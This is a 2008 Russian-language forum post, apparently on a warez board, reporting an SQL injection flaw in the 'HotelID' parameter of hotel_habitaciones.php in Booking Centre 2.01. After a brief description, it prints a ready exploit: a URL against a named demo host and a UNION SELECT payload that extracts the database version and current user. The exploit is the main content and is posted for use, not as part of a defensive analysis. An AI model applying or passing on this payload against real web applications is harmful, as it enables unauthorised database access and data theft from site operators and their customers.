SQL-инъекция в Booking Centre

Страница: 1

Сообщений 1 страница 1 из 1

Поделиться12008-11-29 09:49:31

Автор: Giorgi
Администратор
Зарегистрирован: 2008-10-27
Приглашений: 0
Сообщений: 220
Уважение: +1
Позитив: +5
Провел на форуме:
3 дня 0 часов
Последний визит:
2023-05-03 13:12:03

Программа: Booking Centre 2.01

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «HotelID» сценарием hotel_habitaciones.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://demo.hotelsadmin.com/www_en/hote … p?HotelID=(SQL)

(SQL): 1+union+select+concat_ws(0x3a,@@version,0x3a,user())--

Страница: 1

Warez Portal

Меню навигации

Пользовательские ссылки

Информация о пользователе

SQL-инъекция в Booking Centre

Сообщений 1 страница 1 из 1

Поделиться12008-11-29 09:49:31